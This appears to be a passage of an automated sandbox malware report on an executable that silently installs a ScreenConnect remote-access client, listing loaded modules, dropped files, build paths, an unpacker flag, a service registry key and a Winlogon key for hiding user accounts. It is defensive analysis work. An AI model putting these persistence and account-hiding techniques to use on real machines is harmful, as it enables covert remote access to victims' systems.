                                  Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: version.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: wldp.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: profapi.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: amsi.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: userenv.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: netutils.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: sspicli.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: propsys.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: windowscodecs.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: wtsapi32.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: winsta.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: wbemcomn.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: netapi32.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: wkscli.dll
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                                  Source: Window RecorderWindow detected: More than 3 window changes detected
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                                  Source: f53WqfzzNt.exeStatic PE information: certificate valid
                                  Source: f53WqfzzNt.exeStatic file information: File size 5620624 > 1048576
                                  Source: f53WqfzzNt.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x533200
                                  Source: f53WqfzzNt.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                                  Source: f53WqfzzNt.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                                  Source: f53WqfzzNt.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                                  Source: f53WqfzzNt.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                  Source: f53WqfzzNt.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                                  Source: f53WqfzzNt.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                                  Source: f53WqfzzNt.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                  Source: f53WqfzzNt.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.2.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdbM source: f53WqfzzNt.exe
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientInstallerRunner\obj\Release\ScreenConnect.ClientInstallerRunner.pdb source: f53WqfzzNt.exe
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdb source: f53WqfzzNt.exe
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdbT source: Microsoft.Deployment.WindowsInstaller.dll.4.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.2.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller.Package\Microsoft.Deployment.WindowsInstaller.Package.pdb source: Microsoft.Deployment.WindowsInstaller.Package.dll.4.dr
                                  Source: Binary string: C:\Compile\screenconnect\Product\WindowsAuthenticationPackage\bin\Release\ScreenConnect.WindowsAuthenticationPackage.pdb source: ScreenConnect.ClientService.exe, 00000007.00000002.3589517953.00000000024F7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1835897049.0000000012350000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: f53WqfzzNt.exe, ScreenConnect.Core.dll.4.dr, ScreenConnect.Core.dll.2.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3574448875.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1829810694.0000000002312000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1829941114.0000000002341000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1829695484.00000000022D0000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.ClientService.dll.2.dr
                                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\DotNetResolver\obj\Debug\DotNetResolver.pdb source: f53WqfzzNt.exe
                                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000007.00000000.1769116462.0000000000C0D000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe.2.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: f53WqfzzNt.exe, ScreenConnect.Windows.dll.2.dr, ScreenConnect.Windows.dll.4.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression.Cab\Microsoft.Deployment.Compression.Cab.pdb source: rundll32.exe, 00000004.00000003.1742512877.0000000004430000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1736264146.00000000045AA000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.4.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdb source: Microsoft.Deployment.WindowsInstaller.dll.4.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\InstallerActions\obj\Release\net20\ScreenConnect.InstallerActions.pdb source: ScreenConnect.InstallerActions.dll.4.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression\Microsoft.Deployment.Compression.pdb source: rundll32.exe, 00000004.00000003.1736264146.000000000453B000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.dll.4.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\ship\x86\wixca.pdb source: f53WqfzzNt.exe, 4ec961.msi.2.dr, MSICBE0.tmp.2.dr, MSICFCA.tmp.2.dr, 4ec95f.msi.2.dr, MSICBF0.tmp.2.dr, ScreenConnect.ClientSetup.msi.0.dr, 4ec960.rbs.2.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbS] source: f53WqfzzNt.exe, ScreenConnect.Windows.dll.2.dr, ScreenConnect.Windows.dll.4.dr
                                  Source: Binary string: screenconnect_windows_credential_provider.pdb source: ScreenConnect.ClientService.exe, 00000007.00000002.3589517953.00000000024F7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1835897049.0000000012350000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.2.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000008.00000000.1778391029.0000000000E62000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.2.dr
                                  Source: Binary string: E:\delivery\Dev\wix37_public\build\ship\x86\SfxCA.pdb source: f53WqfzzNt.exe, 4ec961.msi.2.dr, MSIC2F6.tmp.1.dr, 4ec95f.msi.2.dr, ScreenConnect.ClientSetup.msi.0.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbu source: ScreenConnect.WindowsClient.exe, 00000008.00000000.1778391029.0000000000E62000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.2.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbi source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1837827239.000000001AD32000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.2.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1837827239.000000001AD32000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.2.dr
                                  Source: Binary string: screenconnect_windows_credential_provider.pdb' source: ScreenConnect.ClientService.exe, 00000007.00000002.3589517953.00000000024F7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1835897049.0000000012350000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.2.dr
                                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetRunner.pdb source: f53WqfzzNt.exe
                                  Source: f53WqfzzNt.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                  Source: f53WqfzzNt.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                  Source: f53WqfzzNt.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                  Source: f53WqfzzNt.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                  Source: f53WqfzzNt.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                                  Data Obfuscation

                                  barindex
                                  .NET source code contains potential unpacker
                                  Source: 0.0.f53WqfzzNt.exe.14578ec.1.raw.unpack, Program.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                                  Source: 0.2.f53WqfzzNt.exe.1720000.0.raw.unpack, Program.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                                  Source: f53WqfzzNt.exeStatic PE information: real checksum: 0x54d1c1 should be: 0x55ee26
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exeCode function: 0_2_016B70B0 push eax; mov dword ptr [esp], ecx0_2_016B70C1
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeCode function: 7_2_0399CE68 push ebx; ret 7_2_0399CE92
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeCode function: 7_2_0399F22B pushfd ; ret 7_2_0399F249
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeCode function: 7_2_0399D043 pushad ; ret 7_2_0399D052
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeCode function: 7_2_052142D1 push esp; ret 7_2_052142E3
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeCode function: 7_2_0522369B push ebx; iretd 7_2_052236DA
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeCode function: 7_2_0522BCF0 push eax; retf 7_2_0522BCF1
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FFD9B3022ED push ebx; retf 8_2_00007FFD9B3022FA
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FFD9B30096D push ebx; retf 8_2_00007FFD9B30098A
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FFD9B3008CD push ebx; retf 8_2_00007FFD9B30098A
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FFD9B60792B push ebx; retf 8_2_00007FFD9B60796A
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FFD9B607928 push ebx; retf 8_2_00007FFD9B60796A
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FFD9B608D84 push es; iretd 8_2_00007FFD9B608D85
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FFD9B6055E1 push es; iretd 8_2_00007FFD9B605627
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFD9B2F23CD push ebx; iretd 10_2_00007FFD9B2F240A
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFD9B2F22ED push ebx; retf 10_2_00007FFD9B2F22FA
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFD9B2F096D push ebx; retf 10_2_00007FFD9B2F098A
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFD9B2F08CD push ebx; retf 10_2_00007FFD9B2F098A
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFD9B2E3750 push eax; retf 10_2_00007FFD9B2E381D
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFD9B5F2F12 pushfd ; iretd 10_2_00007FFD9B5F2F13

                                  Persistence and Installation Behavior

                                  barindex
                                  Creates files in the system32 config directory
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log
                                  Possible COM Object hijacking
                                  Source: c:\program files (x86)\screenconnect client (a532d472f1ff1d4e)\screenconnect.windowscredentialprovider.dllCOM Object registered for dropped file: hkey_local_machine\software\classes\clsid\{6ff59a85-bc37-4cd4-66e1-82ebbd1a2a17}\inprocserver32
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsCredentialProvider.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSICFCA.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSIC2F6.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.Client.dllJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSIC2F6.tmp-\Microsoft.Deployment.Compression.dllJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSIC2F6.tmp-\ScreenConnect.Windows.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.dllJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSIC2F6.tmp-\ScreenConnect.InstallerActions.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsAuthenticationPackage.dllJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSIC2F6.tmp-\ScreenConnect.Core.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsFileManager.exeJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSICBF0.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.Windows.dllJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSIC2F6.tmp-\Microsoft.Deployment.Compression.Cab.dllJump to dropped file
                                  Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSIC2F6.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSIC2F6.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.Core.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSICFCA.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSICBF0.tmpJump to dropped file
                                  Source: ScreenConnect.ClientService.dll.2.drBinary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\ApplicationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (a532d472f1ff1d4e)Jump to behavior

                                  Hooking and other Techniques for Hiding and Protection

                                  barindex
                                  Contains functionality to hide user accounts
                                  Source: f53WqfzzNt.exe, 00000000.00000002.1745545743.0000000005890000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                                  Source: f53WqfzzNt.exe, 00000000.00000000.1715442940.0000000000F26000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                                  Source: rundll32.exe, 00000004.00000003.1736264146.00000000045B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                                  Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3574448875.00000000030F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1829810694.0000000002312000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1829941114.0000000002341000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1829695484.00000000022D0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1839973403.000000001B342000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                                  Source: f53WqfzzNt.exeString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                                  Source: ScreenConnect.ClientService.dll.2.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                                  Source: ScreenConnect.Windows.dll.2.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                                  Source: ScreenConnect.Windows.dll.4.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
